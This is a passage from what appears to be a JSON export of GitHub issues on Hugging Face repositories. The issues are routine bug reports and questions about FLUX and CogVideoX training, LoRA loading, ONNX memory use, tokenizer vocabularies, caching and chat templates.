"hjw-0909" }, { "repo": "huggingface/diffusers", "number": 9727, "title": "FLUX.1-dev dreambooth save problem trained on multigpu", "body": "### Describe the bug\n\nI tried to train flux using accelerate and deepspeed, but when using two L40s, the model could not be saved properly. What is the problem?\n\n### Reproduction\n\ntrain.sh:\r\naccelerate launch --config_file config.yaml train_flux.py \\\r\n --pretrained_model_name_or_path=\"./FLUX.1-dev\" \\\r\n --resolution=1024 \\\r\n --train_batch_size=1 \\\r\n --output_dir=\"output1\" \\\r\n --num_train_epochs=10 \\\r\n --checkpointing_steps=5 \\\r\n --validation_steps=500 \\\r\n --max_train_steps=40001 \\\r\n --learning_rate=4e-05 \\\r\n --seed=12345 \\\r\n --mixed_precision=\"fp16\" \\\r\n --revision=\"fp16\" \\\r\n --use_8bit_adam \\\r\n --gradient_accumulation_steps=1 \\\r\n --gradient_checkpointing \\\r\n --lr_scheduler=\"constant_with_warmup\" --lr_warmup_steps=2500 \\\r\n\r\nconfig.yaml:\r\ncompute_environment: LOCAL_MACHINE\r\ndebug: false\r\ndeepspeed_config:\r\n gradient_accumulation_steps: 1\r\n gradient_clipping: 1.0\r\n offload_optimizer_device: cpu\r\n offload_param_device: cpu\r\n zero3_init_flag: false\r\n zero_stage: 2\r\ndistributed_type: DEEPSPEED\r\ndowncast_bf16: 'no'\r\ngpu_ids: 0,1\r\nenable_cpu_affinity: false\r\nmachine_rank: 0\r\nmain_training_function: main\r\nmixed_precision: fp16\r\nnum_machines: 1\r\nnum_processes: 2\r\nrdzv_backend: static\r\nsame_network: true\r\ntpu_env: []\r\ntpu_use_cluster: false\r\ntpu_use_sudo: false\r\nuse_cpu: false\n\n### Logs\n\n```shell\nUsing /home/oppoer/.cache/torch_extensions/py310_cu117 as PyTorch extensions root...\r\nNo modifications detected for re-loaded extension module utils, skipping build step...\r\nLoading extension module utils...\r\nTime to load utils op: 0.00030350685119628906 seconds\r\n10/21/2024 02:58:18 - INFO - __main__ - ***** Running training *****\r\n10/21/2024 02:58:18 - INFO - __main__ - Num examples = 2109730\r\n10/21/2024 02:58:18 - INFO - __main__ - Num batches each epoch = 1054865\r\n10/21/2024 02:58:18 - INFO - __main__ - Num Epochs = 1\r\n10/21/2024 02:58:18 - INFO - __main__ - Instantaneous batch size per device = 1\r\n10/21/2024 02:58:18 - INFO - __main__ - Total train batch size (w. parallel, distributed & accumulation) = 2\r\n10/21/2024 02:58:18 - INFO - __main__ - Gradient Accumulation steps = 1\r\n10/21/2024 02:58:18 - INFO - __main__ - Total optimization steps = 40001\r\nSteps: 0%| | 0/40001 [00:00 byte value. So some characters get other representations, like for example the white space `U+0020` becomes `\u0120`.\r\n\r\nThe purpose is, by doing so, you end up with an initial alphabet of 256 tokens. These 256 tokens can then be merged together to represent any other token in the vocabulary. This results in smaller vocabularies, that won't ever need an \"unknown\" token.\r\n\r\n_Originally posted by @n1t0 in https://github.com/huggingface/tokenizers/issues/203#issuecomment-605105611_\r\n\r\n@n1t0\r\nThank you for your previous responses. I have been working with a large tokenizer of a LLM, and I've noticed that the vocabulary contains a significant amount of information that like these unreadable codes. \r\n\r\nI wonder if there are any methods or tools available to help me read and interpret the information in the tokenizer's vocabulary. For example, is there a way to map these tokens back to their original words or phrases, or any other approach to make the vocabulary more interpretable?\r\n ", "url": "https://github.com/huggingface/tokenizers/issues/1661", "state": "closed", "labels": [], "created_at": "2024-10-20T13:38:53Z", "updated_at": "2024-10-21T07:29:43Z", "user": "kaizhuanren" }, { "repo": "huggingface/diffusers", "number": 9719, "title": "`disable_progress_bar` is ignored for some models (Loading checkpoint shards)", "body": "### Describe the bug\n\nWhen loading some pipelines, `diffusers.utils.logging.disable_progress_bar()` doesn't disable all progress bars. In particular the \"Loading checkpoint shards\" progress bar still appears. The \"Loading pipeline components...\" progress bar, however, is disabled as expected. Models I found, where this occurs, are: \r\n\r\n* [`stabilityai/stable-diffusion-3-medium-diffusers`](https://huggingface.co/stabilityai/stable-diffusion-3-medium-diffusers)\r\n* [`black-forest-labs/FLUX.1-schnell`](https://huggingface.co/black-forest-labs/FLUX.1-schnell)\r\n\r\nThe image generation progress bar also doesn't respect this setting, but can be disabled with `pipe.set_progress_bar_config(disable=True)`. When files are downloaded, the progress bars are also not disabled. These two cases seem like they might be intentional. Are they?\r\n\r\nIs there better way to disable progress bars globally for diffusers? Can the \"Loading checkpoint shards\" progress bar be disabled specifically?\n\n### Reproduction\n\n```python\r\nimport diffusers\r\ndiffusers.utils.logging.disable_progress_bar()\r\n# pipe = diffusers.StableDiffusion3Pipeline.from_pretrained('stabilityai/stable-diffusion-3-medium-diffusers')\r\npipe = diffusers.FluxPipeline.from_pretrained('black-forest-labs/FLUX.1-schnell')\r\npipe('test')\r\n```\n\n### Logs\n\n```shell\n>>> pipe = diffusers.FluxPipeline.from_pretrained('black-forest-labs/FLUX.1-schnell')\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:03<00:00, 1.56s/it]\r\nYou set `add_prefix_space`. The tokenizer needs to be converted from the slow tokenizers\r\n>>>\n```\n\n\n### System Info\n\nGoogle Colab\r\n\r\nor locally:\r\n\r\n- \ud83e\udd17 Diffusers version: 0.30.3\r\n- Running on Google Colab?: No\r\n- Python version: 3.12.7\r\n- PyTorch version (GPU?): 2.5.0+cu124 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.26.0\r\n- Transformers version: 4.45.2\r\n- Accelerate version: 1.0.1\r\n- PEFT version: not installed\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\n\n### Who can help?\n\n@sayakpaul @DN6", "url": "https://github.com/huggingface/diffusers/issues/9719", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-19T17:42:37Z", "updated_at": "2024-10-19T19:29:12Z", "comments": 2, "user": "JonasLoos" }, { "repo": "huggingface/optimum", "number": 2069, "title": "High CUDA Memory Usage in ONNX Runtime with Inconsistent Memory Release", "body": "### System Info\r\n\r\n```shell\r\nOptimum version: 1.22.0\r\nPlatform: Linux (Ubuntu 22.04.4 LTS)\r\nPython version: 3.12.2\r\nONNX Runtime Version: 1.19.2\r\nCUDA Version: 12.1\r\nCUDA Execution Provider: Yes (CUDA 12.1)\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@JingyaHuang @echarlaix \r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\n```python\r\ndef load_model(self, model_name):\r\n session_options = ort.SessionOptions()\r\n session_options.add_session_config_entry('cudnn_conv_use_max_workspace', '0')\r\n session_options.enable_mem_pattern = False\r\n session_options.arena_extend_strategy = \"kSameAsRequested\"\r\n session_options.gpu_mem_limit = 10 * 1024 * 1024 * 1024\r\n \r\n model = ORTModelForSeq2SeqLM.from_pretrained(model_name, provider=\"CUDAExecutionProvider\", session_options=session_options)\r\n tokenizer = AutoTokenizer.from_pretrained(model_name)\r\n return tokenizer, model\r\n\r\ndef inference(self, batch, doc_id='-1'):\r\n responses, status = '', False\r\n try:\r\n encodings = self.tokenizer(batch, padding=True, truncation=True, max_length=8192, return_tensors=\"pt\").to(self.device)\r\n with torch.no_grad():\r\n generated_ids = self.model.generate(\r\n encodings.input_ids,\r\n max_new_tokens=1024\r\n )\r\n responses = self.tokenizer.batch_decode(generated_ids, skip_special_tokens=True)\r\n status = True \r\n except Exception as e:\r\n logger.error(f\"Failed to do inference on LLM, error: {e}\")\r\n\r\n torch.cuda.empty_cache()\r\n return status, responses\r\n```\r\n\r\n### Expected behavior\r\n\r\nI expect the CUDA memory to decrease and be released after processing smaller inputs, optimizing memory usage for subsequent inputs.\r\n![Picture1](https://github.com/user-attachments/assets/a188ede0-2287-4603-a84e-ba62d309a940)\r\n\r\n", "url": "https://github.com/huggingface/optimum/issues/2069", "state": "closed", "labels": [ "question", "Stale" ], "created_at": "2024-10-19T02:45:54Z", "updated_at": "2024-12-25T02:02:08Z", "user": "niyathimariya" }, { "repo": "huggingface/transformers.js", "number": 981, "title": "Any gotcha's with manually adding items to transformers-cache?", "body": "### Question\r\n\r\nFor [papeg.ai](https://www.papeg.ai) I've implemented that the service worker caches `.wasm` files from `jsDelivir` that Transformers.js [wasn't caching itself yet](https://github.com/huggingface/transformers.js/issues/685#issuecomment-2325125036).\r\n\r\nI've been caching those filesi n the 'main' Papeg.ai cache until now, but I want to switch to saving those files in the `transformers-cache` instead. That would (hopefully) make it so that the .wasm files don't have to be downloaded again if I update papeg.ai (which clears the papeg.ai cache). And vice-versa: the transformers cache could be fully cleared independently of the papeg.ai cache (ideally Transformers.js would manage all this itself).\r\n\r\n- Is this a reasonable idea?\r\n- Is this in line with your plans for a future improved caching system? Or do you, for example, plan to keep wasm, onnx and config files in separate caches, like WebLLM?\r\n- Will Transformers.js even look for those .wasm files in `transformers-cache` first? With the service worker this doesn't technically matter, as requests to jsDelivir are captured anyway. But the service worker isn't always available.\r\n\r\nTangentially, would it be an idea to (also) store the code and wasm files on Huggingface itself? Because of EU privacy regulations, and good privacy design in general, I'd like to keep third parties that the site needs to connect to to an absolute minimum. I'd love to eliminate jsDelivir, and only rely on Github and HuggingFace. Or is there perhaps a way to tell Transformers.js where to look? Then I could host the files on Github/HuggingFace manually.\r\n\r\nJust for fun, here's a service worker code snippet that, from now on, stores the jsDelivir files in the transformers-cache:\r\n\r\n```\r\nlet target_cache = cacheName;\r\n\t\t\t\t\t\t\t\t\t\tif(request.url.indexOf('https://cdn.jsdelivr.net/npm/@huggingface/transformers') != -1){\r\n\tconsole.log(\"service_worker: saving to transformers-cache: \", request.url);\r\n\ttarget_cache = 'transformers-cache';\r\n}\r\n\r\ncaches.open(target_cache)\r\n.then(function(cache) {\r\n\tcache.put(request, fetch_response_clone);\r\n})\r\n.catch((err) => {\r\n\tconsole.error(\"service worker: caught error adding to cache: \", err);\r\n})\r\n```\r\n", "url": "https://github.com/huggingface/transformers.js/issues/981", "state": "open", "labels": [ "question" ], "created_at": "2024-10-18T12:53:07Z", "updated_at": "2024-10-18T12:56:21Z", "user": "flatsiedatsie" }, { "repo": "huggingface/transformers", "number": 34241, "title": "How to output token by token use transformers?", "body": "### System Info\n\n...\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n...\n\n### Expected behavior\n\nHow to output token by token use transformers?", "url": "https://github.com/huggingface/transformers/issues/34241", "state": "closed", "labels": [ "Discussion", "bug" ], "created_at": "2024-10-18T09:45:19Z", "updated_at": "2024-11-26T08:04:43Z", "user": "xuanzhangyang" }, { "repo": "huggingface/lerobot", "number": 477, "title": "Collecting human operated datasets in simulation", "body": "Hello,\r\n\r\nCan you provide info on how human supervision was provided for the simulated datasets (e.g. `lerobot/aloha_sim_transfer_cube_human`)? I am starting to setup a similar MuJoCo gym environment for the Stretch (https://github.com/mmurray/gym-stretch) and I would like to collect/train on some human teleop data, but it seems like the current `control_robot.py` script and data collection examples are setup only for physical robots. Is there a branch somewhere with the code used to collect `lerobot/aloha_sim_transfer_cube_human` that I can reference?\r\n\r\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/477", "state": "closed", "labels": [ "question", "dataset", "simulation" ], "created_at": "2024-10-17T23:24:17Z", "updated_at": "2025-10-08T08:49:32Z", "user": "mmurray" }, { "repo": "huggingface/lighteval", "number": 365, "title": "[FT] Using lighteval to evaluate a model on a single sample, how?", "body": "Thank you the team for the great work. I have a question. Can you please help me to use lighteval to evaluate a model on a single sample? \r\n\r\nFor example, if I have an input from mmlu I, my model generates output O, how can I use lighteval to evaluate O with using the Acc metric?\r\n\r\nThanks!", "url": "https://github.com/huggingface/lighteval/issues/365", "state": "closed", "labels": [ "feature" ], "created_at": "2024-10-17T12:43:45Z", "updated_at": "2024-10-24T10:12:54Z", "user": "dxlong2000" }, { "repo": "huggingface/diffusers", "number": 9700, "title": "Flux inversion", "body": "current img2img is not so well, [RF Inversion](https://rf-inversion.github.io/)) provides an inverse method for Flux real image editing, can we implement it using diffusers?\r\n\r\nor how can we use DDIM inversion in Flux?", "url": "https://github.com/huggingface/diffusers/issues/9700", "state": "closed", "labels": [], "created_at": "2024-10-17T07:03:59Z", "updated_at": "2024-12-17T16:00:30Z", "comments": 8, "user": "yuxu915" }, { "repo": "huggingface/diffusers", "number": 9698, "title": "Unable to Retrieve Intermediate Gradients with CogVideoXPipeline", "body": "### Describe the bug\n\nWhen generating videos using the CogVideoXPipeline model, we need to access the gradients of intermediate tensors. However, we do not require additional training or parameter updates for the model.\r\n\r\nWe tried using register_forward_hook to capture the gradients, but this approach failed because the CogVideoXPipeline disables gradient calculations. Specifically, in pipelines/cogvideo/pipeline_cogvideox.py at line 478, gradient tracking is turned off with @torch.no_grad().\r\n\r\nHow can we resolve this issue and retrieve the gradients without modifying the model\u2019s parameters or performing extra training?\r\n\n\n### Reproduction\n\nSample Code\r\npipe = CogVideoXPipeline.from_pretrained(\r\n \"THUDM/CogVideoX-2b\",\r\n torch_dtype=torch.float16\r\n)\r\nvideo = pipe(\r\n prompt=prompt,\r\n num_videos_per_prompt=1,\r\n num_inference_steps=50,\r\n num_frames=49,\r\n guidance_scale=6,\r\n generator=torch.Generator(device=\"cuda\").manual_seed(42),\r\n).frames[0]\r\n\r\nPipeline Code Reference \r\npipelines/cogvideo/pipeline_cogvideox.py at line 478\r\n@torch.no_grad()\r\n@replace_example_docstring(EXAMPLE_DOC_STRING)\r\ndef __call__(\r\n self,\r\n prompt: Optional[Union[str, List[str]]] = None,\r\n negative_prompt: Optional[Union[str, List[str]]] = None,\r\n height: int = 480,\r\n width: int = 720,\n\n### Logs\n\n_No response_\n\n### System Info\n\nDiffusers version: 0.30.3\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9698", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-17T04:30:56Z", "updated_at": "2024-10-27T10:24:41Z", "comments": 4, "user": "lovelyczli" }, { "repo": "huggingface/diffusers", "number": 9697, "title": "train_text_to_image_sdxl training effect is very poor", "body": "I use DeepSpeed for training: train_text_to_image_sdxl.py \r\n1.The data volume is 231 pieces\r\n2. deepspeed json\r\n![\u4f01\u4e1a\u5fae\u4fe1\u622a\u56fe_17291359065532](https://github.com/user-attachments/assets/f82ad033-d786-4fe4-9264-3b6236304170)\r\n3.Training Script\r\n![\u4f01\u4e1a\u5fae\u4fe1\u622a\u56fe_17291362274700](https://github.com/user-attachments/assets/ae5a6207-dbc8-4dde-b5d7-dcdaa0ac2783)\r\n4.After training, use the training prompt words again\uff0cThe generated effect is as follows:\r\n![\u4f01\u4e1a\u5fae\u4fe1\u622a\u56fe_17291363542986](https://github.com/user-attachments/assets/004d3e51-de2e-453b-864a-803794659d2c)\r\n\r\nMay I ask everyone, what is the reason for the poor generation effect\uff1f\r\n", "url": "https://github.com/huggingface/diffusers/issues/9697", "state": "closed", "labels": [], "created_at": "2024-10-17T03:40:17Z", "updated_at": "2024-10-17T08:32:44Z", "comments": 2, "user": "wzhiyuan2016" }, { "repo": "huggingface/finetrainers", "number": 41, "title": "cannot access local variable 'gradient_norm_before_clip' where it is not associated with a value", "body": "During both I2V and t2V training, sometimes I encountered the error \r\n\r\n```\r\n[rank1]: File \"/root/projects/cogvideox-factory/training/cogvideox_text_to_video_lora.py\", line 762, in main\r\n[rank1]: \"gradient_norm_before_clip\": gradient_norm_before_clip,\r\n[rank1]: ^^^^^^^^^^^^^^^^^^^^^^^^^\r\n[rank1]: UnboundLocalError: cannot access local variable 'gradient_norm_before_clip' where it is not associated with a value\r\n```\r\n\r\nThis is probably [here](https://github.com/a-r-r-o-w/cogvideox-factory/blob/a6c246c29d11d78e4aa3fb4b137c5ffd8d719d94/training/cogvideox_text_to_video_lora.py#L715) in the following code\r\n```\r\nif accelerator.sync_gradients:\r\n gradient_norm_before_clip = get_gradient_norm(transformer.parameters())\r\n accelerator.clip_grad_norm_(transformer.parameters(), args.max_grad_norm)\r\n gradient_norm_after_clip = get_gradient_norm(transformer.parameters())\r\n```\r\nsomehow `accelerator.sync_gradients` is false sometimes. \r\n\r\nIs there a quick fix? Is it only for logging?\r\n", "url": "https://github.com/huggingface/finetrainers/issues/41", "state": "closed", "labels": [], "created_at": "2024-10-16T18:34:19Z", "updated_at": "2024-12-06T08:09:46Z", "user": "Yuancheng-Xu" }, { "repo": "huggingface/finetrainers", "number": 40, "title": "How to load the fine-tuned I2V model's LoRA module", "body": "I have successfully fine-tuned an I2V model (locally, without pushing to HF) and would like to load it for inference. I use the following code suggested in the readme\r\n\r\n```\r\nmodel_name = \"THUDM/CogVideoX-5b-I2V\" \r\npipe = CogVideoXImageToVideoPipeline.from_pretrained(\r\n model_name, torch_dtype=torch.bfloat16\r\n).to(\"cuda\")\r\n\r\npipe.load_lora_weights(\"MyLocalLoRAPath\", adapter_name=[\"cogvideox-lora\"])\r\npipe.set_adapters([\"cogvideox-lora\"], [1.0])\r\n```\r\n\r\nHowever I encounter the error \r\n\r\n```\r\nFile ~/anaconda3/envs/cogvideox-i2v/lib/python3.11/site-packages/diffusers/loaders/lora_pipeline.py:2451, in CogVideoXLoraLoaderMixin.load_lora_into_transformer(cls, state_dict, transformer, adapter_name, _pipeline):\r\n\r\nif adapter_name in getattr(transformer, \"peft_config\", {}):\r\naise ValueError(\r\n f\"Adapter name {adapter_name} already in use in the transformer - please select a new adapter name.\" )\r\n\r\nTypeError: unhashable type: 'list'\r\n```\r\n\r\nNote: in the trained LoRA folders, there is only a `pytorch_lora_weights.safetensors`", "url": "https://github.com/huggingface/finetrainers/issues/40", "state": "closed", "labels": [], "created_at": "2024-10-16T17:25:21Z", "updated_at": "2024-12-03T03:01:23Z", "user": "Yuancheng-Xu" }, { "repo": "huggingface/transformers.js", "number": 975, "title": "Supporting Multiple Pipelines?", "body": "### Question\n\nFirst of all, thank you so much for creating transformers.js! This is a fantastic library, and I had lots of fun building with it!\r\n\r\nI have a question regarding using pipelines API: Would it be possible to start multiple pipelines? For example, instead of using just one pipeline to run inference, can we create a pool of pipelines and push jobs into this pool, potentially better utilize the multi-cores on modern laptops? \r\n\r\nThe goal here is really to understand if there's ways to utilize multi-cores. No worries if not! I just want to understand where the limits are.\r\n\r\nThanks!", "url": "https://github.com/huggingface/transformers.js/issues/975", "state": "closed", "labels": [ "question" ], "created_at": "2024-10-16T08:06:44Z", "updated_at": "2024-10-21T15:58:20Z", "user": "kelayamatoz" }, { "repo": "huggingface/chat-ui", "number": 1525, "title": "Standardize Chat Prompt Templates to Use Jinja Format", "body": "## Describe your feature request\r\n\r\nCurrently, the `chatPromptTemplate` for each model that can be set in env uses **Handlebars** format. However, the `chat_prompt` in the actual model's `tokenizer_config.json` uses **Jinja** format. This inconsistency is causing significant inconvenience. Since **Jinja** is widely used and preferred, it would be beneficial to standardize on **Jinja** format for both `chatPromptTemplate` and `chat_prompt`. This will improve consistency and ease of use for developers.\r\n\r\n## Screenshots (if relevant)\r\n\r\n## Implementation idea\r\n\r\nTo implement this change, the following steps can be taken:\r\n\r\n1. Update Codebase: Update the codebase to handle **Jinja** templates for `chatPromptTemplate`.\r\n\r\n2. Documentation: Update the documentation to reflect this change and provide examples of how to use **Jinja** templates.\r\n\r\n3. Testing: Thoroughly test the changes to ensure compatibility and that all existing templates work correctly with the new format.", "url": "https://github.com/huggingface/chat-ui/issues/1525", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-10-16T05:26:12Z", "updated_at": "2024-11-20T00:44:16Z", "comments": 8, "user": "calycekr" }, { "repo": "huggingface/alignment-handbook", "number": 201, "title": "Full parameter fine-tuning keeps consuming system RAM and lead to crash ", "body": "I am using alignment handbook to perform a full parameter fine-tuning of llama3 models with Deepspeed stage 2 on my own dataset which is relatively large (400k+ records). \r\nThe training was performed on a slurm cluster with two nodes (each has 4 H100 GPUs).\r\nI have noticed that during the training, the system memory utilization keeps increasing even though I set torch_empty_cache_steps=500. \r\nI wonder if there is something wrong with the HF trainer? Any suggestions how to fix/debug? \r\nThere is also a similar issue at https://github.com/huggingface/transformers/issues/30119\r\n\r\n- Below is the system ram usage report from wandb:\r\n\r\n![Screenshot 2024-10-15 at 10 41 49\u202fAM](https://github.com/user-attachments/assets/1201d5ad-26ee-4d15-81c1-9ef33128bba0)\r\n![Screenshot 2024-10-15 at 10 41 46\u202fAM](https://github.com/user-attachments/assets/200b887c-38bd-40f9-a160-e61c14c25870)\r\n![Screenshot 2024-10-15 at 10 41 43\u202fAM](https://github.com/user-attachments/assets/4fee96b4-fd08-4073-a17a-dd7d4cfd8e34)\r\n\r\n\r\n\r\n\r\n\r\n- my config:\r\n```yaml\r\n# Model arguments\r\nmodel_name_or_path: ~/models/Meta-Llama-3-8B\r\nmodel_revision: main\r\ntorch_dtype: bfloat16\r\nattn_implementation: flash_attention_2\r\n\r\n# Data training arguments\r\nchat_template: \"{{ bos_token }}{% if messages[0]['role'] == 'system' %}{% set system_message = '### System Instruction: ' + messages[0]['content'] | trim + '' %}{% set messages = messages[1:] %}{% else %}{% set system_message = '' %}{% endif %}{{ bos_token + system_message }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if message['role'] == 'user' %}{{ '### Context: ' + message['content'] | trim + '' }}{% elif message['role'] == 'assistant' %}{{ '### Result: ' + message['content'] | trim + ' ' + eos_token }}{% endif %}{% endfor %}{% if add_generation_prompt %}{{ '### Result: ' }}{% endif %}\"\r\ndataset_mixer:\r\n ~/data/processed_data_open_sourced_xml_to_text/merged_open_sourced_xml_to_text_dataset: 1.0\r\ndataset_splits:\r\n- train_sft\r\n- test_sft\r\npreprocessing_num_workers: 4\r\ndataloader_num_workers: 2\r\n\r\n# SFT trainer config\r\nbf16: true\r\ndo_eval: true\r\n# evaluation_strategy: epoch\r\neval_strategy: epoch\r\nmax_grad_norm: 1.0\r\n# gradient_accumulation_steps: 16\r\ngradient_checkpointing: true\r\ngradient_checkpointing_kwargs:\r\n use_reentrant: False\r\nlog_level: info\r\nlogging_steps: 5\r\nlogging_strategy: steps\r\nlearning_rate: 2.0e-05\r\nlr_scheduler_type: cosine_with_min_lr # cosine_with_min_lr\r\nlr_scheduler_kwargs:\r\n min_lr: 5e-6\r\noptim: adamw_torch # adamw_torch paged_adamw_32bit galore_adamw lion_32bit\r\noptim_target_modules: all-linear\r\nweight_decay: 0.01\r\nmax_seq_length: 12800\r\npacking: false\r\ndataset_num_proc: 16\r\nmax_steps: -1\r\nnum_train_epochs: 1\r\noutput_dir: /~/alignment-handbook/experiments/models/llama3\r\noverwrite_output_dir: true\r\nper_device_eval_batch_size: 1\r\nper_device_train_batch_size: 1 # this is per device, you need to manual calculate global batch by per device * gas * gpu * node\r\ngradient_accumulation_steps: 8\r\npush_to_hub: false\r\nremove_unused_columns: true\r\nreport_to:\r\n- wandb # - tensorboard\r\nsave_strategy: \"steps\"\r\nsave_steps: 500\r\ntorch_empty_cache_steps: 500\r\nsave_total_limit: 30\r\nseed: 42\r\nwarmup_ratio: 0.1\r\n```\r\n\r\n- training launch script (brief version)\r\n```sh\r\n\r\n#!/bin/bash\r\n\r\n#SBATCH --job-name=train\r\n#SBATCH --nodes=2\r\n#SBATCH --ntasks-per-node=1\r\n#SBATCH --gpus-per-node=4\r\n#SBATCH --gpus-per-task=4\r\n#SBATCH --cpus-per-task=32\r\n#SBATCH --mem=512gb\r\n#SBATCH --time=96:00:00\r\n#SBATCH --output=output\r\n#SBATCH --partition=batch\r\n\r\n# apptainer\r\nCONTAINER=pt2402.sif\r\nTRAIN_CONF=config.yaml\r\nDEEPSPEED_CONF=deepspeed_zs2.json\r\nCMD=torchrun \\\r\n --nproc_per_node=$SLURM_GPUS_ON_NODE \\\r\n --nnode=$SLURM_JOB_NUM_NODES \\\r\n --node_rank=$SLURM_NODEID \\\r\n --master_addr=$PRIMARY \\\r\n --master_port=$PRIMARY_PORT \\\r\n ${ROOT}/scripts/run_sft.py \\\r\n $TRAIN_CONF \\\r\n --deepspeed=$DEEPSPEED_CONF \\\r\n --tee=3\r\n\r\nsrun --jobid $SLURM_JOB_ID apptainer exec --nv $CONTAINER bash -c $CMD\r\n```\r\n\r\n- deepspeed config:\r\n```json\r\n{\r\n \"fp16\": {\r\n \"enabled\": false,\r\n \"loss_scale\": 0,\r\n \"auto_cast\": false,\r\n \"loss_scale_window\": 1000,\r\n \"initial_scale_power\": 16,\r\n \"hysteresis\": 2,\r\n \"consecutive_hysteresis\": false,\r\n \"min_loss_scale\": 1\r\n },\r\n\r\n \"bf16\": {\r\n \"enabled\": true\r\n },\r\n\r\n \"optimizer\": {\r\n \"type\": \"AdamW\",\r\n \"params\": {\r\n \"lr\": \"auto\",\r\n \"weight_decay\": \"auto\",\r\n \"betas\": \"auto\",\r\n \"eps\": \"auto\",\r\n \"torch_adam\": true,\r\n \"adam_w_mode\": true\r\n }\r\n },\r\n\r\n \"scheduler\": {\r\n \"type\": \"WarmupDecayLR\",\r\n \"params\": {\r\n \"warmup_min_lr\": 1e-8,\r\n \"warmup_max_lr\": \"auto\",\r\n \"warmup_num_steps\": \"auto\",\r\n \"total_num_steps\": \"auto\"\r\n }\r\n }", "url": "https://github.com/huggingface/alignment-handbook/issues/201", "state": "closed", "labels": [], "created_at": "2024-10-15T15:04:18Z", "updated_at": "2024-10-17T18:56:53Z", "comments": 2, "user": "xiyang-aads-lilly" }, { "repo": "huggingface/chat-ui", "number": 1522, "title": "Add example prompt field to tools", "body": "## Describe your feature request\r\n\r\nThis lets the user specify a prompt that would call the tool. It can be shown as a demo if you're not sure how to use a tool. \r\n\r\nWe should show it somewhere in the UI so the user can easily start a conversation from that demo. \r\n\r\nIt can also be used for validating that a tool works. (run the example server-side, if the tool does not get called or does not return an output then something is wrong and dont let users publish it)\r\n\r\n## Implementation idea\r\n\r\nStoring the prompt itself is straightforward since you can just store it as a string. Most tools use file inputs though so we should ideally also support that, which means storing example files in the DB.", "url": "https://github.com/huggingface/chat-ui/issues/1522", "state": "open", "labels": [ "enhancement", "front", "back", "tools" ], "created_at": "2024-10-15T12:42:42Z", "updated_at": "2024-10-15T12:42:43Z", "comments": 0, "user": "nsarrazin" }, { "repo": "huggingface/optimum", "number": 2060, "title": "Support int8 tinyllama tflite export.", "body": "### Feature request\n\ntflite exporter for decoder only llms such as tinyllama\n\n### Motivation\n\nSome platforms only support full int8 op and full int8 tflite models can be deployed. Is there a support plan? Looking forward to your reply, thank you.\n\n### Your contribution\n\nno", "url": "https://github.com/huggingface/optimum/issues/2060", "state": "closed", "labels": [ "feature-request", "Stale" ], "created_at": "2024-10-15T03:25:54Z", "updated_at": "2024-12-09T02:11:36Z", "comments": 1, "user": "hayyaw" }, { "repo": "huggingface/diffusers", "number": 9673, "title": "high cpu usage when loading multiple loras at once.", "body": "### Describe the bug\r\n\r\nHi, I was making a synthesis system using celery and diffusers, \r\nand I found the cpu usage of program goes high when loading loras,\r\nit is okay when I use just one worker, but it becomes hard when using 8 workers at once.\r\n\r\nIt happens when lora loaded first time, and I think it is because of peft, because I didn't get any trouble before peft support.\r\n\r\nso Is there any way to lower cpu usage when loading loras? or is there any way not to use peft when sdxl lora loading?\r\n\r\n### Reproduction\r\n\r\n```python\r\n# test lora downloaded from https://civitai.com/models/150986/blueprintify-sd-xl-10\r\n\r\nfrom diffusers import AutoPipelineForText2Image\r\nimport torch\r\nfrom uuid import uuid4\r\nfrom tqdm import tqdm\r\n\r\npipeline = AutoPipelineForText2Image.from_pretrained(\"stabilityai/stable-diffusion-xl-base-1.0\", torch_dtype=torch.float16).to(\"cuda\")\r\nnum_of_iterations = 10\r\n\r\n\r\nfor _ in tqdm(range(num_of_iterations)):\r\n lora_name = str(uuid4().hex)\r\n pipeline.load_lora_weights(\r\n \"./test\",\r\n weight_name=\"lora.safetensors\",\r\n adapter_name=lora_name,\r\n low_cpu_mem_usage=True,\r\n )\r\n pipeline.set_adapters([lora_name], adapter_weights=[1.0])\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\ntorch==2.1.1+cu121\r\ndiffusers==0.30.3\r\naccelerate==0.32.1\r\npeft==0.13.0\r\ntransformers==4.42.3\r\npython==3.9.5\r\n\r\n### Who can help?\r\n\r\n@sayakpaul", "url": "https://github.com/huggingface/diffusers/issues/9673", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-15T01:49:37Z", "updated_at": "2024-10-15T05:07:40Z", "comments": 5, "user": "gudwns1215" }, { "repo": "huggingface/datasets", "number": 7226, "title": "Add R as a How to use from the Polars (R) Library as an option", "body": "### Feature request\r\n\r\nThe boiler plate code to access a dataset via the hugging face file system is very useful. Please addd \r\n\r\n\r\n## Add Polars (R) option\r\nThe equivailent code works, because the [Polars-R](https://github.com/pola-rs/r-polars) 